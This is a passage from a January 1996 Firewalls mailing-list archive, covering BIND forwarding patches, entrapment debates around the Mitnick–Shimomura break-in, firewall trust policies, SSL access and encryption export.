bind-users@vix.com Subject: patches for bind-4.9.3-REL to support 'noforward' directive X-Sender: avento@lncsex0003.eu.btco.com Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The patches to support the 'noforward' directive in the named.boot configuration file are available by anonymous FTP at: ftp://ftp.is.co.za/networking/ip/dns/bind/contrib/noforward.tar.gz As a reminder, these patches allow you to support normal delegation on a nameserver that is configured with 'forwarders'. Without these patches, delegation records for zones not held locally are always ignored if there is a 'forwarders' directive. Thanks to Andras Salamon (andras@is.co.za) for providing space on his server. Cheers, Todd.Aven@BankersTrust.Com From firewalls-owner Fri Jan 12 09:54:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA21894 for firewalls-outgoing; Fri, 12 Jan 1996 08:29:43 -0800 (PST) Received: from mclo20 ([164.167.86.20]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA21888 for ; Fri, 12 Jan 1996 08:29:14 -0800 (PST) Message-Id: <199601121629.IAA21888@miles.greatcircle.com> Received: from [164.167.86.100] by mclo20.med.navy.mil (SMTPD32-95.07.27) id AD0637E01E6; Fri Jan 12 11:32:06 1996 Comments: Authenticated sender is From: "Bob Resino" To: Ron DuFresne Date: Fri, 12 Jan 1996 11:26:43 +0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura ( Reply-to: pnh1rgr@mclo10.med.navy.mil CC: firewalls@GreatCircle.COM X-mailer: Pegasus Mail for Windows (v2.10) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Date: Thu, 11 Jan 1996 11:50:54 -0600 (CST) > From: Ron DuFresne > To: Brain21 > Cc: Doug Hughes , firewalls@GreatCircle.COM > Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) SNIP > > Agreed, either we have here an exterme case of over-confidence, > misconfiguring by others really doing the security, or good old Mitnick > was 'invited' in a case bordering on entrapment. Seems very strange in > either way, seems strange if not an outright blunder. > > Later, > > > Ron Dufresne > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > "Cutting the space budget really restores my faith in humanity. It > eliminates dreams, goals, and ideals and lets us get straight to the > business of hate, debauchery, and self-annihilation." -- Johnny Hart > ***testing, only testing, and damn good at it too!*** > > OK, so you're a Ph.D. Just don't touch anything. > > Ron, In some states, there is no such thing as "Entrapment". Such is the case in the Commonwealth of Virginia. One simple warning screen like the CERT P.L. 98-473 warning would preclude any claim of entrapment. Bob Resino Bob Resino (RGR24) Head, MID/Data-telecommunications 804-398-7400 x322 MCLO, HSO, Norfolk, VA (US Navy) Fax 804-398-7265 pnh1rgr@mclo10.med.navy.mil From firewalls-owner Fri Jan 12 09:54:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA19700 for firewalls-outgoing; Fri, 12 Jan 1996 07:31:10 -0800 (PST) Received: from PCC.SSW.DHHS.GOV (ibm.pcc.dhhs.gov [192.73.61.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA19685 for ; Fri, 12 Jan 1996 07:30:56 -0800 (PST) Received: from PHSSEA.SSW.DHHS.GOV by PCC.SSW.DHHS.GOV (Soft*Switch Central V4L380P7) id 253328100096012FPHSSEA; 12 Jan 1996 10:28:10 EST Message-Id: Date: 12 Jan 1996 10:28:10 EST From: "Administrator" Subject: Message not deliverable To: Firewalls@GREATCIRCLE.COM Comment: MEMO 01/12/96 10:25:00 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Status Distribution The message regarding "Firewalls-Digest V5 #15" sent on 1/12/96 6:44AM was addressed to the following invalid recipients. Robert Matson at ~PHSSEA Please consult your cc:Mail Administrator. From firewalls-owner Fri Jan 12 09:56:27 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA19679 for firewalls-outgoing; Fri, 12 Jan 1996 07:30:22 -0800 (PST) Received: from PCC.SSW.DHHS.GOV (ibm.pcc.dhhs.gov [192.73.61.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA19642 for ; Fri, 12 Jan 1996 07:30:06 -0800 (PST) Received: from PHSSEA.SSW.DHHS.GOV by PCC.SSW.DHHS.GOV (Soft*Switch Central V4L380P7) id 240728100096012FPHSSEA; 12 Jan 1996 10:28:10 EST Message-Id: Date: 12 Jan 1996 10:28:10 EST From: "Administrator" Subject: Message not deliverable To: Firewalls@GREATCIRCLE.COM Comment: MEMO 01/12/96 10:25:00 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Status Distribution The message regarding "Firewalls-Digest V5 #22" sent on 1/12/96 4:06AM was addressed to the following invalid recipients. Robert Matson at ~PHSSEA Please consult your cc:Mail Administrator. From firewalls-owner Fri Jan 12 09:58:57 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA21616 for firewalls-outgoing; Fri, 12 Jan 1996 08:18:28 -0800 (PST) Received: from skypoint.com (mirage.skypoint.com [199.86.32.7]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA21609 for ; Fri, 12 Jan 1996 08:18:23 -0800 (PST) Received: from [199.86.33.3] by skypoint.com with smtp (Smail3.1.28.1 #6) id m0tam85-0005QkC; Fri, 12 Jan 96 10:15 CST X-Sender: ray@mirage.skypoint.net Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 12 Jan 1996 10:20:10 -0600 To: Firewalls@GreatCircle.COM From: ray@rayk.com (Ray Kaplan) Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (Long) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ... >My personal opinion is either 2 or 3. Has anyone on the list actually >discussed this with him? I would be interested in his side, since we all >really only have part of the story. Anyone? ... Oh, what the hell. I can't resist. 'sides that, one of my friends just got hammered by such an attack. **Warning** The following may simply be mindless babble. Besides, the BEST news of the day is the fact that Philip Zimmermann is "will not be prosecuted in connection with the posting to USENET in June 1991 of the encryption program Pretty Good Privacy. The investigation is closed." (Extracted from a post to cypherpunks@toad.com.) re: Kevin Mitnick questions I think that the current spate of books, media, movies and such will preclude such a detailed, personal conversation with Kevin for a while. However, here is my plan: - Someone(s) puts some money on the table (needed to get past the current noise level from the people / orgs that are bidding for this) - I'll put together a plan to interview Kevin (et al - including some of the folks who rode the coat tails of those who are *apparently* responsible for the various happenings), and then present it to the powers that be in the current game (agents in Hollywood and lawyers in LA and Kevin). - I propose a pay-for-view audio teleconference wherein an honest broker would moderate. I'd be happy to do this based on my previous experience with interviewing Kevin in such a venue (I have tapes of that 1993 teleconference for sale - note: part of the $ from any sales of those tapes goes to Kevin since I have a royalty deal with him for the effort.) No attempt at commercialism here, I'll never even recover my losses on this project. - Such a conference would be cheap (funded by telecom expenses of attendees), permit everyone to get their questions answered, *and* (perhaps, most importantly) allow Kevin (et al) to speak his / their mind(s) freely - *AND* NOT be the usual, mindless talk show junk. - Revenues from such a conference would defray its costs, offer Kevin (et al) something for his / their time, and be put toward some form of information distribution that would smarten everyone up. What has prevented me from doing this already? When Kevin and Lenny attacked DEC and were done with the initial mess in 1988 (after successfully stealing the source code for version 5 of VMS from DEC *across the net* before it shipped), Robert Clyde (Axent Technologies) and I invented a conference session called History of Recent Computer Break-ins in the DECUS (DEC user group) Symposium context. In that presentation, we featured (as one case study) the DEC case. As things played out, I struck up a relationship with Kevin (at his instigation since someone told him I wanted to talk to *HIM*, I think) in 1990. The result of this was Kevin's willingness to talk publicly about the DEC deal at the 1990 U.S. DECUS Fall Symposium. DEC, DECUS, and - in no small measure - *my peers* - slapped me silly as a reward for my effort to take advantage of Kevin's willingness to talk publicly. Besides a first order hit on my career, the fallout from this little deal contributed significantly to my 1993 personal bankruptcy. I'm still reeling from *THAT* disaster. Also, my 15 minutes of fame on the net came as a result of this episode (I was immortalized in the signature lines of people who were sucked into the that erupted on comp.os.vms during those days.) If anyone is interested (and I can get past my shaky hands) I'll put the history of this, and the current version of History of Recent Computer Break-ins presentation up on www.rayk.com/rayk sometime soon. There is a rumor afoot that DECUS is making the handouts available: consult www.decus.org for pointers to the effort. Meantime, if you want a hard copy of the History of Recent Computer Break-ins presentation, I suggest that you look at www.axent.com. I don't have the resources to get this to you at the moment, but Rob and our trusty watchdog / helper Becky Hasson tells me that Axent will make hard copy of the presentation available at www.axent.com as soon as the Axent office on the East coast digs out form the snow cover (1/15/96?). Hence, someone(s) gotta write some substantial checks (not to me) this time around - I have no more to donate to trying to smarten people up about certain things such as the facts about Kevin. As a consultant / trainer / speaker, I have my hands full with the spate of people who don't seem to want to hear that their use of today's TCP is simply *not correct*. Frankly, folks. By the time all of this becomes known (if it ever does), we all will get our attitudes adjusted. The answers to the questions that are being asked (and more that will be asked) will hardly leave anyone comfortable. Or is it that you believe that all of the plea bargains are some sort of magic? Until then, I suggest: - Anyone who wants to apply some pressure to get Kevin's story out should contact one of the only "honest brokers" that I have had personal experience with in this matter: journalist Joe Panateri @ InformationWeek magazine. A few notes to his editor would go along way to getting him the franchise he needs to get some (more) work done on this. Choosing Joe Panateri as a focus also will allow the whole story to get displayed to CIOs and others who (so far) *still* don't seem to get it: you gotta get serious about this security stuff and *spend resources* on it! - Stay away from the Wall Street Journal - their "hacker reporter" (Sandler?) seems to have no idea of the real issues that are on the table and displays personal enmity towards me when I try to answer his questions about them. - Support the Washington Post and their apparent willingness to allow honest brokers to ask hard questions about all of this. - Apply some intelligence to this - demand accurate reporting, detailed technical analysis and factual answers to the hard questions that are on the table - Insist (no, you can't demand) that people - especially those in power (e.g., CIOs) *stop* trying to treat security as "just another bunch of technical detail." - Insist (no, you can't demand) that people - especially those in power (e.g., CEOs) understand that infrastructure security is - perhaps - *THE* issue upon which everything else depends. Or, is it that you believe that you can really get through the current paradigm shifts without being able to trust your systems and networks? Mumble, mumble... Would someone please cross post this to other appropriate forums? My hands shake badly when the reality of my last involvement in this stuff reminds me how deep the wounds were. RayK 8) Ray Kaplan Security Services - P.O Box 23210 - Richfield, MN USA 55423 (612) 861-7198 - FAX (612) 861-3736 - www: http://www.rayk.com/rayk ray@rayk.com - Not an expert, just a battered vet. From firewalls-owner Fri Jan 12 10:14:16 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA19681 for firewalls-outgoing; Fri, 12 Jan 1996 07:30:25 -0800 (PST) Received: from PCC.SSW.DHHS.GOV (ibm.pcc.dhhs.gov [192.73.61.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA19643 for ; Fri, 12 Jan 1996 07:30:06 -0800 (PST) Received: from PHSSEA.SSW.DHHS.GOV by PCC.SSW.DHHS.GOV (Soft*Switch Central V4L380P7) id 041828100096012FPHSSEA; 12 Jan 1996 10:28:10 EST Message-Id: Date: 12 Jan 1996 10:28:10 EST From: "Administrator" Subject: Message not deliverable To: Firewalls@GREATCIRCLE.COM Comment: MEMO 01/12/96 10:25:00 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Status Distribution The message regarding "Firewalls-Digest V5 #13" sent on 1/12/96 4:37AM was addressed to the following invalid recipients. Robert Matson at ~PHSSEA Please consult your cc:Mail Administrator. From firewalls-owner Fri Jan 12 10:15:46 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA19467 for firewalls-outgoing; Fri, 12 Jan 1996 07:24:05 -0800 (PST) Received: from PCC.SSW.DHHS.GOV (ibm.pcc.dhhs.gov [192.73.61.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA19454 for ; Fri, 12 Jan 1996 07:23:58 -0800 (PST) Received: from PHSSEA.SSW.DHHS.GOV by PCC.SSW.DHHS.GOV (Soft*Switch Central V4L380P7) id 550122100096012FPHSSEA; 12 Jan 1996 10:22:10 EST Message-Id: Date: 12 Jan 1996 10:22:10 EST From: "Administrator" Subject: Message not deliverable To: Firewalls@GREATCIRCLE.COM Comment: MEMO 01/12/96 10:21:00 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Status Distribution The message regarding "Firewalls-Digest V5 #19" sent on 1/11/96 11:08PM was addressed to the following invalid recipients. Robert Matson at ~PHSSEA Please consult your cc:Mail Administrator. From firewalls-owner Fri Jan 12 10:23:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA20547 for firewalls-outgoing; Fri, 12 Jan 1996 07:53:29 -0800 (PST) Received: from ibmmail.COM (ibmmail.com [199.171.26.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA20542 for ; Fri, 12 Jan 1996 07:53:22 -0800 (PST) From: gblolmxb@ibmmail.com Message-Id: <199601121553.HAA20542@miles.greatcircle.com> Received: from ibmmail by ibmmail.COM (IBM VM SMTP V2R3) with BSMTP id 0019; Fri, 12 Jan 96 10:51:37 EST Date: Fri, 12 Jan 1996 10:51:54 EST To: firewalls@greatcircle.com MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Subject: Lotus Notes' Internotes Web Navigator Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On 13/12/95 (or 12/13/95 for those of you in the colonies), Lotus announced the integration of their Internotes Publisher product with soon-to-be-released Notes 4. They also announced Web navigator software for the Notes client. Has anyone got any other info on this? Such as: o how are HTML retrive requests routed through a Notes infrastructure to the Notes server o What sort of security is provided at the Notes server, e.g. is a seperate firewall need between the ISP line & the Server? o Are FTP & SMTP links in web pages supported? o Has anyone 'seen' it working? Mark blackman gblolmxb@ibmmail.com From firewalls-owner Fri Jan 12 10:23:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA19859 for firewalls-outgoing; Fri, 12 Jan 1996 07:36:21 -0800 (PST) Received: from colt.milepost.com (colt.milepost.com [164.57.50.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA19854 for ; Fri, 12 Jan 1996 07:36:09 -0800 (PST) Received: (from phil@localhost) by colt.milepost.com (8.6.12/8.6.9) id JAA07556; Fri, 12 Jan 1996 09:34:59 -0600 From: Phil Howard Message-Id: <199601121534.JAA07556@colt.milepost.com> Subject: Re: "Title for Firewall Admin? To: billcurr@cyberspace.com (Bill Curr) Date: Fri, 12 Jan 1996 09:34:59 -0600 (CST) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Bill Curr" at Jan 11, 96 04:04:55 pm X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Bill Curr writes... > The mail administrator is "postmaster" > The web server admin is "webmaster" > Is there such a title for a firewall administrator? > And is there a list of these colorful "nom de nets" anywhere? No idea. I just thought up: "netsentry" -- Phil Howard KA9WGN +-------------------------------------------------+ Linux Consultant | The enemy of my enemy is NOT my friend... | Milepost Services | ...but he is a convenient ally! | phil@milepost.com +-------------------------------------------------+ From firewalls-owner Fri Jan 12 10:28:09 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA20210 for firewalls-outgoing; Fri, 12 Jan 1996 07:45:43 -0800 (PST) Received: from picard.nib.com ([205.136.146.102]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA20203 for ; Fri, 12 Jan 1996 07:45:38 -0800 (PST) Received: from picard.nib.com (jclark@picard.nib.com [205.136.146.102]) by picard.nib.com (8.6.9/8.6.9) with SMTP id LAA06514; Fri, 12 Jan 1996 11:02:04 -0500 Date: Fri, 12 Jan 1996 11:02:04 -0500 (EST) From: "Jay R. Clark" To: David Loysen cc: firewalls@GreatCircle.COM Subject: Re: Allow SSL through a firewall? In-Reply-To: <199601111732.JAA02316@spike.hnc.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Maybe lurking around on this list is making me paranoid....... But why not > put the WWW server and whatever data you want the world to see outside the > firewall. Isn't it cheaper to duplicate the non-secure data outside the **off** Ummm you can leave a sacrificial machine out on the net, with a policy that sez "who cares, we have it all backed up". In our case we accumulate data from callers for our clients, the data is confidential/propriatary, if we leave it out on the sacrificial machine we run the risk of letting 4th parties obtain it and create one hella liablility problem for ourselfs and for our clients. **on** From firewalls-owner Fri Jan 12 10:28:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA19615 for firewalls-outgoing; Fri, 12 Jan 1996 07:29:02 -0800 (PST) Received: from aspensys (nahro.org [198.77.70.103]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA19592 for ; Fri, 12 Jan 1996 07:28:41 -0800 (PST) Received: from smtpinet.aspensys.com (smtpgate.aspensys.com) by aspensys (5.0/SMI-SVR4) id AA00721; Fri, 12 Jan 1996 10:21:39 +0500 Received: from ccMail by smtpinet.aspensys.com (SMTPLINK V2.10.08) id AA821472474; Fri, 12 Jan 96 10:45:25 EST Date: Fri, 12 Jan 96 10:45:25 EST From: "Jim Meritt" Message-Id: <9600128214.AA821472474@smtpinet.aspensys.com> To: Brain21 Cc: firewalls@GreatCircle.COM, bens@archimedes.vislab.navy.mil Subject: Re[4]: Mitnick & the TCP Sequence Number Attack on Shimo Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Tough when you try to impress folks (with that classification nonsense) and reality intrudes. Do you often go waving red flags to attract people's attention to places? Maybe you also assisted in the naming of hackers.com? Amazed at childishness. Enough, already. Jim Meritt ______________________________ Reply Separator _________________________________ Subject: Re: Re[2]: Mitnick & the TCP Sequence Number Attack on Shimo Author: Brain21 at SMTPINET Date: 1/12/96 3:20 AM On Thu, 11 Jan 1996, Jim Meritt wrote: > Concur. DISNET yes. Internet no. > > Unless maybe you/he WANT him arrested.... > > Or maybe he was just spinning a tale and you fell for it. Or maybe he > just didn't understand how it was working. 1) I was NOT spinning a tale 2) I DON'T want my father arrested (for WHAT? Pray tell?) 3) I never mentioned that classified info was sent over the net. Read more carefully before making assumptions. As I stated in my follow-ups (which really should not have even been necessary. C'mon some of you assume and inferr WAY too much!!!!) I said that he had top secret clearance. I said that the company that he worked for (a DoD subcontractor) kept in touch w/ it's other offices over the net. I said that they did not use encryption. I inferred that netcom was not secure. I said that I was not allowed to know his email address (company policy) (that's why I got him one plus a butload of software for Christmas a year ago). Now, please show me where I stated that he or his company did, in fact, send ANY classified documents over the net! Guess what? You can't! Cause I never said that! You just assumed that that was what I meant. I said in follow-up posts that it was, in fact, possible for someone to perhaps mention something by accident (BTW, I never said that that did happen, I just mentioned that the possibility was there) just like that OTHER poster had mentioned. I alluded to the fact that *I* thought that the mere possibility of someone inadvertantly saying something was there, and that I thought that in and of itself was insecure. I thought that they should have had NO net connection, at least in the capacity that they did have it. My point was that security is NOT the first thing on everyone's mind, even when it sometimes should be. Now, take these posts and try to get him arrested. Let me know when the lawyers stop laughing at the evidence that you present because it is comprised purely of assumptions and conjecture (and any other redundancies that you can think of). I don't mean for these comments to sound snied, but c'mon. Get real, and stop interpreting what you THINK someone said, especially when you say such inane things as "unless yoou/he WANT him arrested"!!!! Sorry about the bandwidth on this one. I consider this issue dead because of what it has become, and how many completely missed my point to begin with (though not all). Chuckling in amazement, Brain21 From firewalls-owner Fri Jan 12 10:38:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA22890 for firewalls-outgoing; Fri, 12 Jan 1996 09:01:03 -0800 (PST) Received: from tera.bctel.net (tera.bctel.net [204.174.66.253]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id JAA22884 for ; Fri, 12 Jan 1996 09:00:57 -0800 (PST) Received: (from nobody@localhost) by tera.bctel.net (8.7.1/8.7.1) id JAA21464 for ; Fri, 12 Jan 1996 09:00:01 -0800 (PST) X-Authentication-Warning: tera.bctel.net: nobody set sender to using -f Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3) id sma021459; Fri Jan 12 09:00:00 1996 Received: (from murrell@localhost) by mocha.bctel.net (8.7.1/8.7.1) id JAA21884 for firewalls@greatcircle.com; Fri, 12 Jan 1996 09:00:10 -0800 (PST) Date: Fri, 12 Jan 1996 09:00:10 -0800 (PST) From: Brian Murrell Message-Id: <199601121700.JAA21884@mocha.bctel.net> To: firewalls@greatcircle.com Subject: securid and wu-ftp Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-MD5: SHq+9fR/dXlTHnmcAE5UyA== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Folx, Anybody know of any patches to have wu-ftpd use securid for access?? The ACE ftp server is just to featureless for some work we need to do. b. -- Brian J. Murrell murrell@bctel.net BCTel Advanced Communications brian@ilinx.com Vancouver, B.C. brian@wimsey.com 604 454 5261 From firewalls-owner Fri Jan 12 10:42:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA20177 for firewalls-outgoing; Fri, 12 Jan 1996 07:44:28 -0800 (PST) Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA20172 for ; Fri, 12 Jan 1996 07:44:24 -0800 (PST) Date: Fri, 12 Jan 1996 10:43:29 -0500 (EST) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <960112104329.20203704@hobbes.orl.mmc.com> Subject: Trust across I-net Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I rote: >Is easy also to make the first line in your firewall ACL "Deny incoming >". Belt and suspenders are good 8*). Brent wresponded: >Note that this only keeps the spoofers from masquerading as a machine with >one of your IP addresses. If you trust things at other sites, with other >IP addresses, the rule Padgett mentions doesn't keep the spoofers from >masquerading as those trusted things at other sites. If you are extending "trust" in the clear over the Internet to sites out of your control, better keep your resume updated. I have three classes of nets/subnets - "Internal" e.g. controlled, "Untrusted" e.g. anything directly connected to the Internet, and "Limited Exposure" such as dedicated PNS links or encrypted Internet connections to customers/ suppliers with whom we have a formal agreement and is limited to specific nodes/subnets. The conditions that Brent describes as necessary for such activity, I do not consider acceptable (not saying such do not exist, just that I am actively trying to eliminate them - not an easy task when the mergers seem to be hitting daily and this is at a "guns and dogs" corp., must be a nightmare in the commercial world). Warmly, Padgett From firewalls-owner Fri Jan 12 10:44:17 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA23858 for firewalls-outgoing; Fri, 12 Jan 1996 09:32:16 -0800 (PST) Received: from uucp-1.csn.net (uucp-1.csn.net [199.117.27.26]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA23853 for ; Fri, 12 Jan 1996 09:32:12 -0800 (PST) Received: from bacchus.UUCP (uucp@localhost) by uucp-1.csn.net (8.6.12/8.6.12) with UUCP id KAA05992 for greatcircle.com!Firewalls; Fri, 12 Jan 1996 10:31:17 -0700 From: Shawn Steele Message-Id: <9601121030.ZM24307@aob.org> Date: Fri, 12 Jan 1996 10:30:29 -0700 In-Reply-To: firewalls-digest-owner@uunet.uu.net "Firewalls-Digest V5 #21" (Jan 11, 9:50pm) References: <199601120550.VAA24533@miles.greatcircle.com> X-Mailer: Z-Mail Lite (3.2.0 26may94) To: Firewalls@greatcircle.com Subject: Re: "Title for Firewall Admin? Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > The mail administrator is "postmaster" > The web server admin is "webmaster" > Is there such a title for a firewall administrator? Firemaster? From firewalls-owner Fri Jan 12 10:47:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA20215 for firewalls-outgoing; Fri, 12 Jan 1996 07:45:49 -0800 (PST) Received: from portia.merrillcorp.com ([205.139.50.23]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA20209 for ; Fri, 12 Jan 1996 07:45:42 -0800 (PST) From: jeff.aldrich@merrillcorp.com Received: from vpn by merrillcorp.com (PMDF V5.0-5 #13734) id <01HZX2SEZJ808WW27X@merrillcorp.com> for firewalls@greatcircle.com; Fri, 12 Jan 1996 09:46:19 -0600 (CST) Received: from ccinternet.mrll.com by vpn.stp.mrll.com (PMDF V5.0-5 #13735) id <01HZX2RY5I3K94FG2L@vpn.stp.mrll.com> for firewalls@greatcircle.com; Fri, 12 Jan 1996 09:45:19 -0600 (CST) Date: Fri, 12 Jan 1996 09:46 -0600 (CST) Subject: Re[2]: Mitnick & the TCP Sequence Number Attack on Shimomura To: firewalls@greatcircle.com Message-id: <01HZX2RY8G7694FG2L@vpn.stp.mrll.com> MIME-version: 1.0 Content-type: TEXT/PLAIN Content-transfer-encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A couple of people have mentioned that Mitnick may have been "invited" and what therefore entraped. Maybe I'm missing something, but I don't necessarily see how having something left either intentionally or unintentionally vulnerable constitutes invititation to do damage. Seems to me like a burglar claiming entrapment because you invited him/her to steal things when you forgot to lock the door. I think entrapment entails actively enticing someone to engage in specific illegal activity. Cops posing as prostitutes to catch customers, if done correctly, isn't entrapment. On the other hand, had Mr. Shimomura posted messages all over the Internet saying "Kevin Mitnick is a lamer, who couldn't crack an egg!" it might be a different story! ;-) (humor alert) From firewalls-owner Fri Jan 12 10:52:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA23153 for firewalls-outgoing; Fri, 12 Jan 1996 09:12:35 -0800 (PST) Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA23147 for ; Fri, 12 Jan 1996 09:12:30 -0800 (PST) Date: Fri, 12 Jan 1996 12:11:35 -0500 (EST) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <960112121135.20203704@hobbes.orl.mmc.com> Subject: re: Encryption export laws from US. Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Barry rites: > Firewall to Firewall encryption is great, but when you have nomadic >remote users and small international offices individual access gets >important for a lot of folks. Plus, some countries now seem to have more >reliable Internet access than private voice/data line access... This is a proper problem (last year had a major one connecting to an office near the Nile. International modem connection was very chancy so wound up using a local trunk provider. Problem then became the *local* dial-up connection) for the list. A year ago, the practical answer (for offsite employees who did not know what to do with a command line) was encrypting modems. This is still a good answer for brane-dead use but an expensive one. Today, the ease-of-use of software based encryption mechanisms such a ViaCrypt's "Enclyptor" floating toobar is markedly improving. Of course the best answer will be secure channels such as created by Netscape commerce servers migrating to the desktop->firewall connection. Is going to happen, hopefully soon (may need a proxy host on a bastion). I figure that in less than a year this will be common practise since it is easier to do for all connections than for some of them. Warmly, Padgett From firewalls-owner Fri Jan 12 10:56:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA22752 for firewalls-outgoing; Fri, 12 Jan 1996 08:57:30 -0800 (PST) Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA22747 for ; Fri, 12 Jan 1996 08:57:26 -0800 (PST) Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id LAA23000; Fri, 12 Jan 1996 11:55:29 -0500 Date: Fri, 12 Jan 1996 11:55:29 -0500 (EST) From: Brain21 To: "Marcus J. Ranum" cc: firewalls@greatcircle.com Subject: Re: Firewalls-Digest V5 #16 In-Reply-To: <199601111500.KAA12166@switchblade.v-one.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I would have responded privately since this really is not of great importance to the list, but at this point, I think that levity is definitely a GOOD THING. Everyone take a DEEP breath, and RELAX. It's only email. :) On Thu, 11 Jan 1996, Marcus J. Ranum wrote: > I'll tell you the secret, if you promise not to spread > it around. :) None but the whole list knows :) > it. Data crosses the air gap on floppies, when it has to, which is > b) I only seldom need to transfer data between the > Windows PC and the Internet, and when I do it > is important stuff so having a spare copy on > a floppy is a Good Thing. > c) Swapping floppies is technically gross and someone > may laugh at me, but I can live with that. Sneaker-net is wonderful. No snooping, and no encryption needed. No need to worry about sequence numbers (just walk "serpentine" from one machine to the other. That'll confuse everyone to the tune of 'why does he walk like that?') ;) > e) I can't afford a firewall, and don't know how to > build one. ????? :) > control and who knows someone might think it was all > an NSA conspiracy. [Which is patent nonsense, since > I work for the KGB, not NSA] Perhaps you know my friends, Boris and Natashia? (Boris is the one w/ the pointy hat, and Natashia is the one that looks like Morticia Addams). Well, at least SOMEONE on the list has a sense of humor too! Brain21 From firewalls-owner Fri Jan 12 10:59:16 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA25429 for firewalls-outgoing; Fri, 12 Jan 1996 10:40:06 -0800 (PST) Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA25422 for ; Fri, 12 Jan 1996 10:40:02 -0800 (PST) Date: Fri, 12 Jan 1996 13:39:07 -0500 (EST) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <960112133907.20203704@hobbes.orl.mmc.com> Subject: re: "Q" Clearance Sender: firewalls-owner@GreatCircle.COM 